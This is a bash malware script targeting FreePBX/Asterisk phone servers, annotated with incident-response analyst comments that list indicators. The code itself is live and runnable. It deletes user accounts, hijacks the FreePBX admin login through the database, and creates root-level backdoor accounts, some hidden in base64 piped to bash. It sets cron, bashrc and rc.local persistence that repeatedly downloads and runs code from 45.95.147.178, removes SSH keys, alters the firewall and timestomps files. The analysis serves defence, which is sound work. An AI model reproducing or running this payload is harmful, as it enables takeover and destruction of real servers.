#!/bin/bash

# Analyst note: staging-directory setup and cleanup.
# Creates the working directories used later in this script. /tmps and /trmp
# are not standard filesystem paths, so their presence on a host is an
# indicator worth searching for.
mkdir -p /tmps /tmp /trmp /var/spool/asterisk/tmp 2>/dev/null || true

# Empties every temp directory (including the legitimate /tmp and /var/tmp)
# and removes /var/lib/asterisk/bin/devnull*. Output and errors are discarded
# and failures are ignored, so the run leaves no console trace.
rm -rf /tmp/* /tmps/* /trmp/* /var/tmp/* /var/tmps/* /var/trmp/* /var/lib/asterisk/bin/devnull* 2>/dev/null || true

# The next three commands remove files named devnull24, devnull23 and devnull2
# from the same locations -- presumably droppers left by earlier runs or by
# other intruders (not established by this file alone).
rm -rf /tmp/devnull24 /tmps/devnull24 /trmp/devnull24 /var/tmp/devnull24 /var/tmps/devnull24 /var/trmp/devnull24 /var/lib/asterisk/bin/devnull24 2>/dev/null || true

rm -rf /tmp/devnull23 /tmps/devnull23 /trmp/devnull23 /var/tmp/devnull23 /var/tmps/devnull23 /var/trmp/devnull23 /var/lib/asterisk/bin/devnull23 2>/dev/null || true

rm -rf /tmp/devnull2 /tmps/devnull2 /trmp/devnull2 /var/tmp/devnull2 /var/tmps/devnull2 /var/trmp/devnull2 /var/lib/asterisk/bin/devnull2 2>/dev/null || true

# Also removes files named "k" and all dot-files (three or more characters
# after the dot) in the temp directories.
rm -rf /tmp/k /tmps/k /tmp/.??* /tmps/.??* /trmp/.??* 2>/dev/null || true
# ============================================
# Analyst note: destructive account purge.
# For every /etc/passwd entry whose UID is 0 or >= 1000 and whose name is not
# "root", this runs userdel -rf, strips the name from passwd/shadow/group/
# gshadow with sed, and deletes /home/<name>. Legitimate operator accounts and
# their home directories are lost along with any rogue ones; recovery needs
# backups. The account name is spliced unquoted into a shell command string.
cd /tmp 2>/dev/null; awk -F: '($3 == 0 || $3 >= 1000) && $1 != "root" {system("userdel -rf " $1 " 2>/dev/null; sed -i \"/^" $1 ":/d\" /etc/passwd /etc/shadow /etc/group /etc/gshadow; rm -rf /home/" $1 " 2>/dev/null")}' /etc/passwd
# ============================================
# Analyst note: FreePBX web-admin takeover through the local database.
# Connects to the "asterisk" database as MySQL root with an empty password,
# deletes every ampusers row except "admin", and inserts a "freepbxusers"
# account with sections='*' and a fixed SHA-1 password hash.
# IR: compare ampusers against a known-good export and treat the SHA-1 value
# below as an indicator; a root MySQL login with no password is the
# precondition this relies on.
mysql -u root --password='' asterisk -e "DELETE FROM ampusers WHERE username != 'admin'; INSERT INTO ampusers SET username='freepbxusers', sections='*', password_sha1='6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9';" 2>/dev/null || true
# ============================================
# Second pass: keeps only "admin" and "freepbxusers", overwrites the existing
# admin password hash with the same value, and upserts "freepbxusers". After
# this the real administrator's web password no longer works.
mysql -u root --password='' asterisk -e "DELETE FROM ampusers WHERE username NOT IN ('admin', 'freepbxusers'); UPDATE ampusers SET password_sha1='6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9', sections='*' WHERE username='admin'; INSERT INTO ampusers (username, password_sha1, sections) VALUES ('freepbxusers', '6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9', '*') ON DUPLICATE KEY UPDATE password_sha1='6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9', sections='*';" 2>/dev/null || true
# ============================================
# Analyst note: removal of PHP files matching web-shell signatures.
# Collects the paths of PHP files under /var/www/html that match generic
# web-shell patterns (eval/base64_decode, system($_GET[...]), eval($_POST) ...)
# or specific marker strings and base64 fragments, de-duplicates the list and
# deletes each file. Because the same script installs its own persistence
# further down, this presumably evicts other intruders' shells rather than
# cleaning the host (inference, not shown by this file alone).
# IR: the deleted files are evidence of earlier compromise; recover them from
# backups or snapshots. The literal strings below are usable as hunt
# signatures against backups and other hosts.
{
    grep -r --include="*.php" -l -E "(eval.*base64_decode|/\*[A-Za-z0-9]+\*/eval|system\(\\\$_GET\[)|eval\(\\\$_POST|eval\(\\\$_REQUEST|eval\(\\\$_GET|system\(\\\$c\s" /var/www/html/ 2>/dev/null
    grep -rE --include="*.php" "PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgPgo8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIiBzaXplPSc4MCcgLz4KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSJFeGVjdXRlIiAvPiA8aHIgLz4KPC9mb3JtPg" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "New-Pbx" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "Emad__Was__Here" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "VictamPbx" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "t3rr0r" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "Hacked" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "b374k" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgPjxpbnB1dCBzaXplPTIwIHR5cGU9cGFzc3dvcmQgbmFtZT0icCIgLz48aW5wdXQgc2l6ZT02MCB0eXBlPXRleHQgbmFtZT0iYyIgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9IkhhY2tlZCIgLz48L2Zvcm0" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "Black Ban V1.01" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJiYgbWQ1KCRfUkVRVUVTVFsnbWQ1J10pID09ICdiNmJhMGZlNDgxOWI2NWUzOTZlNzEzNzg1YjI1ODI2ZScpIHsKICAgICRfU0VTU0lPTlsnbG9va2knXSA9ICdsb2dnZWQnOwp9CmlmICghaXNzZXQoJF9TRVNTSU9OWydsb29raSddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "CnNlc3Npb25fc3RhcnQoKTsKaWYgKGlzc2V0KCRfUkVRVUVTVFsnbWQ1J10pICYmIG1kNSgkX1JFUVVFU1RbJ21kNSddKSA9PT0gJzc1ODY4ZTA4ZGNhNzE4YTVlYmRhYzdmNGU3NjJhODRiJykgewogICAgJF9TRVNTSU9OWydNQUZJQSddID0gJ2xvZ2dlZCc7Cn0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ01BRklBJ10pKSB7CiAgICBlY2hvICc8Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZDUiIHNpemU9IjMyIi8" /var/www/html/ 2>/dev/null | cut -d ':' -f1
} | sort -u | while read file; do
    # Only regular files are removed; errors are discarded.
    [ -f "$file" ] && rm -rf "$file" &>/dev/null || true
done

# Analyst note: first of a long run of identical pipelines that differ only
# in the marker string. Each one lists *.php files under /var/www
# NUL-delimited, keeps the text files containing the marker (grep -I skips
# binaries, -l prints names only) and deletes them. Errors are discarded and
# failure is ignored. This covers all of /var/www, not only /var/www/html.
# The markers in this run are candidate hunt signatures for the web shells
# being removed; what each marker belongs to is not shown here.
find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '<?php system(' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Emad__Was__Here' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'XIlphUsiO4msro7W13SzX93D' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'E8BcHrsgsXBGDf' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '34SapF2b' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'PRWV3tQ99H8fhI0ho' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgPjxpbnB1dCBzaXplPTIwIHR5cGU9cGFzc3dvcmQgbmFtZT0icCIgLz48aW5wdXQgc2l6ZT02MCB0eXBlPXRleHQgbmFtZT0iYyIgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9IkhhY2tlZCIgLz48L2Zvcm0' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'b374k' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Hacked' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Unauth0r1zed' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 't3rr0r' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '0e192062b367640f89ecff7c7f4ae1b9' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '52fFCRq3eSzikNOACwOlABWSU337FD' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '1JEjqYvbRSA8PMTjB' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'qkLKx22ycIdbEdd2ewNodHRy' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'UApLWfZz3vIhSFBPJvUnolRm' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'vz3onejOSL3vRSA9Ch3poEEyDkKFFfXnZZZQ647HnV2ceA' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'XCafVCH5E7TLib5Vw6PWqyfDDu' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'z5IB9IIKD4bAsifd3tTghCaD' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'a5xdnFSPhEOWpff9K02tTUcLdgg8qEgLCLwPPOzw3nt' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'ZBGmlpULjIylRE83rv3nO9RPviPfwQZbf' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'H1IT0eAYFb2NlKOrCU7jIKWdkhue6jQavQbgrQtcJDMfzfTlDVvaf6OCzetgyPhlERKTWgAdr5iX9qoU6z0NUS2otImreZ33vi7aIVQzdQG0aDVsJDGEXiMpeWE' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Black Ban V1.01' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'xtb4iPdnIWJRxU8IyOQEcyjY' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '6thGn5eUaCSpzv' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'HI7sTioa' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJiYgbWQ1KCRfUkVRVUVTVFsnbWQ1J10pID09ICdiNmJhMGZlNDgxOWI2NWUzOTZlNzEzNzg1YjI1ODI2ZScpIHsKICAgICRfU0VTU0lPTlsnbG9va2knXSA9ICdsb2dnZWQnOwp9CmlmICghaXNzZXQoJF9TRVNTSU9OWydsb29raSddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '5Bx04ERlrGnXR2yra' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'PC2DFckV8Pr7VsIlz' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'B0WykLMrTWM3ksFE7CwoqHqB' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'xBzLIuwz8oDrW2' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Nmg8ls5H' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJiYgbWQ1KCRfUkVRVUVTVFsnbWQ1J10pID09ICdiNmJhMGZlNDgxOWI2NWUzOTZlNzEzNzg1YjI1ODI2ZScpIHsKICAgICRfU0VTU0lPTlsnbG9va2knXSA9ICdsb2dnZWQnOwp9CmlmICghaXNzZXQoJF9TRVNTSU9OWydsb29raSddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'VictamPbx' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgPgo8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIiBzaXplPSc4MCcgLz4KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSJFeGVjdXRlIiAvPiA8aHIgLz4KPC9mb3JtPg' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'New-Pbx' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'd6e08cf66c4e2c48bd74db31cf697615' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '9490f20681692b508c4b04cd14d79190' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '1c95bad5b03658f331833d6ea9e77887' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '9KzV53W471fILfew1M1DULk0' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'FaTaLisTiCz_Fx' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'hRWv5p9vRt90YFivFJjV3L5G' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'IlXGEbLAy9GFYU' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'yhVmfo8f' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'pTFr1cffgGFs0PExj' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'DDwrCQLX' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'v1vXWIUI01ODa0' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Lh76D9c0svOZkklrL9LurM9y' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'ix731zQb7mdDj9mdS' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '9VkwhyK7' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'XOf2eR5oAraIs2' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'aIlL71SrsimmeePxqWBGOpRU' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '6a4IRS7JN4x37MUcb' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'kJnctpXKOi249YYSoaHyqnLW' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'SHzAg0Y1W0QDZUXKj' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'hmQkq0io' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '2PGY4kKo38Axxy' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

# Analyst note: same delete-by-marker pipeline as above, here with an
# extended-regex alternation of several marker strings in one pass.
find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -IlE "INJ3CTOR3|New-Pbx|VictamPbx|b3d0r|yokyok|bm2cjjnRXac1WW3KT7k6MKTR|watchTowr|tchTowr|nvd0rz|bluej|nahda" \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

# The commented-out line below would have widened the sweep to *.js and *.sh.
# The last alternative in the pattern is the start of an SSH RSA public key;
# the same prefix is stripped from authorized_keys files later in this script.
# find /var/www -type f \( -name '*.php' -o -name '*.js' -o -name '*.sh' \) -print0 \
find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -IlE "VictamPbx|a17d1e7875f3d442caba422be33cdfe0|New-Pbx|AAAAB3NzaC1yc2EAAAADAQABAAABAQCLLJeL3g2dbjGE" \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true
# ============================================
# Re-creates the staging directories emptied at the top of the script.
mkdir -p /tmps /tmp /trmp /var/spool/asterisk/tmp 2>/dev/null || true
# ============================================
# Analyst note: each line base64-decodes a command and pipes it straight into
# bash, so the command text never appears in this file in the clear. The
# three strings decode to useradd invocations that create a bash-shell
# account with UID 0 / GID 0 and a preset MD5-crypt ($1$) hash; the account
# names are newfpbxs, newfpbx and xhimax.
# IR: any non-root entry with UID 0 in /etc/passwd is an indicator
# (awk -F: '$3 == 0' /etc/passwd).
printf '%s' 'dXNlcmFkZCAtcyAvYmluL2Jhc2ggIC1vdSAwIC1nIDAgLXAgJyQxJG5SejFDYnRrJDZEbkdzMzduLk9wUGNnZWpVZnA5cC4nIG5ld2ZwYnhzICY+L2Rldi9udWxs' | base64 -d | bash 2>/dev/null || true
printf '%s' 'dXNlcmFkZCAtcyAvYmluL2Jhc2ggIC1vdSAwIC1nIDAgLXAgJyQxJG5SejFDYnRrJDZEbkdzMzduLk9wUGNnZWpVZnA5cC4nIG5ld2ZwYnggJj4vZGV2L251bGw=' | base64 -d | bash 2>/dev/null || true
printf '%s' 'dXNlcmFkZCAtcyAvYmluL2Jhc2ggIC1vdSAwIC1nIDAgLXAgJyQxJG5SejFDYnRrJDZEbkdzMzduLk9wUGNnZWpVZnA5cC4nIHhoaW1heCAmPi9kZXYvbnVsbA==' | base64 -d | bash 2>/dev/null || true
# ============================================
# Analyst note: cron persistence. Each line pipes a single entry into
# `crontab -`, which replaces the invoking user's whole crontab, so the
# host's legitimate scheduled jobs are lost (restore from backup).
# Every entry fetches http://45.95.147.178/k.php over plain HTTP to a local
# path and runs it with bash every 1-3 minutes.
# Indicators: the IP address, the /k.php path, and the drop paths
# /var/lib/asterisk/bin/zen222, /var/lib/asterisk/bin/devnull312,
# /var/lib/asterisk/bin/devnull212, /tmp/.cache/update and
# /dev/shm/.systemd/kernel.
echo '*/1 * * * * wget -q http://45.95.147.178/k.php -O /var/lib/asterisk/bin/zen222 && bash /var/lib/asterisk/bin/zen222' | crontab - 2>/dev/null || true
echo '*/1 * * * * wget -q http://45.95.147.178/k.php -O /var/lib/asterisk/bin/devnull312 && bash /var/lib/asterisk/bin/devnull312' | crontab - 2>/dev/null || true
echo '*/1 * * * * wget -q http://45.95.147.178/k.php -O /var/lib/asterisk/bin/devnull212 && bash /var/lib/asterisk/bin/devnull212' | crontab - 2>/dev/null || true
echo '*/2 * * * * wget -q http://45.95.147.178/k.php -O /tmp/.cache/update && bash /tmp/.cache/update' | crontab - 2>/dev/null || true
echo '*/3 * * * * wget -q http://45.95.147.178/k.php -O /dev/shm/.systemd/kernel && bash /dev/shm/.systemd/kernel' | crontab - 2>/dev/null || true
# ============================================
# Analyst note: immediate second-stage fetch and execution.
mkdir -p /tmps /tmp /trmp /var/spool/asterisk/tmp 2>/dev/null || true
# Eight random lowercase/digit characters; the file name therefore differs on
# every run and cannot be matched by a fixed name.
RANDOM_PAYLOAD=$(tr -dc 'a-z0-9' </dev/urandom | head -c8)
for dir in /tmps /tmp /trmp; do
    # Hidden file (leading dot) in each staging directory.
    PAYLOAD="${dir}/.${RANDOM_PAYLOAD}"
    # Downloads the root URL of 45.95.147.178 with wget, falling back to curl.
    (wget -q --no-check-certificate http://45.95.147.178/ -O "$PAYLOAD" || curl -s --insecure -o "$PAYLOAD" http://45.95.147.178/) 2>/dev/null || true
    # Runs the download with bash only if the file is non-empty. The content
    # is whatever the server returns at run time and is not visible in this
    # file; proxy or DNS logs and a disk image are needed to recover it.
    [ -s "$PAYLOAD" ] && bash "$PAYLOAD" 2>/dev/null || true
done
# ============================================
# Analyst note: SSH key manipulation.
# Removes any authorized_keys line under /home that contains the RSA key
# prefix below -- the same prefix used as a file marker in the PHP sweep
# above, so presumably another party's key (inference).
find /home -name authorized_keys -exec sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABAQCLLJeL3g2dbjGE/d' {} \; 2>/dev/null || true
# Deletes root's authorized_keys outright, which also removes the legitimate
# administrators' key-based access; later lines reset root's password and
# enable PermitRootLogin.
rm -f /root/.ssh/authorized_keys 2>/dev/null || true
# ============================================
# Analyst note: rewrites a fixed list of IP addresses to 45.95.147.178 in
# /etc/freepbx.conf, /etc/asterisk/*.conf, /etc/crontab and /etc/cron.d/*.
# The listed addresses are presumably other operators' hosts whose existing
# download entries get redirected (inference). IR: diff these files against
# known-good copies and hunt for all addresses in the pattern.
for f in /etc/freepbx.conf /etc/asterisk/*.conf /etc/crontab /etc/cron.d/*; do
    [ -f "$f" ] && sed -i "s/62\.171\.157\.156\|178\.214\.77\.7\|45.234\.176\.202\|46\.37\.21\.63\|162\.217\.98\.180\|202\.170\.120\.157\|111\.223\.32\.50/45.95.147.178/g" "$f" 2>/dev/null || true
done
# ============================================
# Analyst note: firewall changes. For each listed address a DROP rule is
# added to INPUT (source) and OUTPUT (destination) unless `iptables -C` finds
# it already present, then the rule set is written to /etc/sysconfig/iptables
# so it survives a reboot on hosts that load that file. 45.95.147.178 is not
# in the list. IR: review /etc/sysconfig/iptables for rules the operator did
# not add.
for i in 62.171.157.156 178.214.77.7 45.234.176.202 46.37.21.63 162.217.98.180 172.93.111.169 107.191.47.36 3.89.108.204 37.252.64.234 202.170.120.157 111.223.32.50; do
    iptables -C INPUT -s $i -j DROP 2>/dev/null || iptables -A INPUT -s $i -j DROP 2>/dev/null || true
    iptables -C OUTPUT -d $i -j DROP 2>/dev/null || iptables -A OUTPUT -d $i -j DROP 2>/dev/null || true
    iptables-save > /etc/sysconfig/iptables
done
# ============================================
# Analyst note: backdoor accounts with root privileges.
# `useradd -o -u 0 -g 0` creates accounts that share UID 0 with root, all with
# the same preset MD5-crypt ($1$) hash, a bash shell and home /dev/null. The
# names (centos, admin, support, issabel, sangoma, emo, xhimax) mostly imitate
# distribution or vendor service accounts. If useradd fails, a line is
# appended directly to /etc/passwd instead.
# IR: list UID 0 entries (awk -F: '$3 == 0' /etc/passwd); only root should
# appear. The hash string is an indicator for /etc/shadow and /etc/passwd.
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' centos -s /bin/bash -d /dev/null 2>/dev/null || echo "centos:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' admin -s /bin/bash -d /dev/null 2>/dev/null || echo "admin:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' support -s /bin/bash -d /dev/null 2>/dev/null || echo "support:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' issabel -s /bin/bash -d /dev/null 2>/dev/null || echo "issabel:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' sangoma -s /bin/bash -d /dev/null 2>/dev/null || echo "sangoma:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' emo -s /bin/bash -d /dev/null 2>/dev/null || echo "emo:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' xhimax -s /bin/bash -d /dev/null 2>/dev/null || echo "xhimax:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
# ============================================
# Analyst note: timestomping. `touch -r` copies the access/modification times
# of footer.php onto ajax.php (creating ajax.php if it does not exist), so
# ajax.php's mtime cannot be trusted. The script does not show what ajax.php
# contains; compare it with the packaged copy by hash, and use ctime, which
# touch cannot set, for timeline work.
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php 2>/dev/null || true
# ============================================
# Analyst note: login/boot persistence. Unless a line containing both
# "setsid" and "serv" is already present, a base64-decoded command line is
# appended to /root/.bash_profile, /root/.bashrc and /etc/rc.local. The
# string decodes to a backgrounded setsid/wget of http://45.95.147.178/k.php
# into /var/spool/asterisk/tmp/serv followed by `bash` on that file, so it
# runs on every root login and at boot where rc.local is honoured.
# IR: inspect those three files for a trailing setsid line and check for
# /var/spool/asterisk/tmp/serv.
for file in {"/root/.bash_profile","/root/.bashrc","/etc/rc.local"}; do if ! grep setsid $file |grep serv >/dev/null 2>/dev/null; then echo "KHNldHNpZCB3Z2V0ICJodHRwOi8vNDUuOTUuMTQ3LjE3OC9rLnBocCIgLU8gL3Zhci9zcG9vbC9hc3Rlcmlzay90bXAvc2VydiAyPi9kZXYvbnVsbCA+L2Rldi9udWxsOyBiYXNoIC92YXIvc3Bvb2wvYXN0ZXJpc2svdG1wL3NlcnYgMj4vZGV2L251bGwgPiAvZGV2L251bGwgJiApIDI+JjE="|base64 -d >> $file; echo "" >> $file; fi; done 2>/dev/null || true
# ============================================
# Analyst note: additional login accounts with home directories and bash
# shells. The names resemble service accounts; "asterisk" normally exists on
# a PBX already, in which case useradd fails and only its password is changed
